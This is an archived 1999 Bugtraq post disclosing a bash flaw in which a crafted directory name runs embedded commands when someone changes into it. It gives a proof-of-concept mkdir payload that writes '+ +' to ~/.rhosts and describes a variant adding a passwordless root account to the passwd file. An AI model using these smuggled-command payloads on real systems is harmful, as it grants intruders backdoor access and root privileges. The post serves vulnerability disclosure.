Bugtraq mailing list archives
Bash Bug
From: shadow () OPERATOR ORG (Shadow)
Date: Tue, 20 Apr 1999 21:25:47 -0400
Figured while everyone was working with bash, I might as well make this one public(I apologize if this is old news, apparently it hasnt been fixed if so). If a user creates a directory with a command like mkdir "\ `echo -e \ "echo + +> ~\57.rhosts\ " > x; source x; rm -f \x\ ` " and someone cd's into said directory, either by accident, or whatever, then it will cause it to actually execute. I also did this with a passwd file, echo a user such as r00t::0:0:\57root\57bin\57bash instead of + + to the rhosts. Played with symlinks and a few other ways to see if perhaps maybe the system could trip it if a user made the directory in say /tmp. Granted it may be a long shot on the users part, the ability to do so is a bad thing IMHO. This didnt seem to work on any of my BSD boxes. shadow - CLE ------------------------------------------------------------------------- Most Failure is due to giving up, not realizing how close to success you were - Thomas Edison -------------------------------------------------------------------------
Current thread:
- Re: Plain text passwords--necessary, (continued)
- Re: Plain text passwords--necessary Aleph One (Apr 16)
- Re: Plain text passwords--necessary Phillip Vandry (Apr 19)
- Corrected Linux 2.2.5 FIN/NULL/XMAS block patch Taral (Apr 19)
- Re: Corrected Linux 2.2.5 FIN/NULL/XMAS block patch Taral (Apr 20)
- Re: Plain text passwords--necessary Taral (Apr 19)
- Re: Plain text passwords--necessary Phillip Vandry (Apr 19)
- Re: Plain text passwords--necessary Trevor Schroeder (Apr 19)
- bug in ssh allowing to be invissible Grzegorz Stelmaszek (Apr 19)
- Re: bug in ssh allowing to be invissible Pete (Apr 20)
- Re: bug in ssh allowing to be invissible Joe Gross (Apr 20)
- NetBSD Security Advisory 1999-009 matthew green (Apr 20)
- Bash Bug Shadow (Apr 20)
- Re: Bash Bug Marc Lehmann (Apr 21)
- Re: Bash Bug Pavel Kankovsky (Apr 22)
- Re: Bash Bug Chet Ramey (Apr 22)
- Re: Plain text passwords--necessary Aleph One (Apr 16)
- L0pht Security Advisory: Cold Fusion App Server Weld Pond (Apr 21)
- Re: Plain text passwords--necessary Densin Roy. (Apr 19)
- Re: Plain text passwords--necessary Daniel Alex Finkelstein (Apr 19)
- AOL Instant Messenger URL Crash Adam Brown (Apr 19)
- Re: AOL Instant Messenger URL Crash Daniel Reed (Apr 20)
- Shopping Carts exposing CC data Joe (Apr 19)
- Re: Shopping Carts exposing CC data Joe (Apr 20)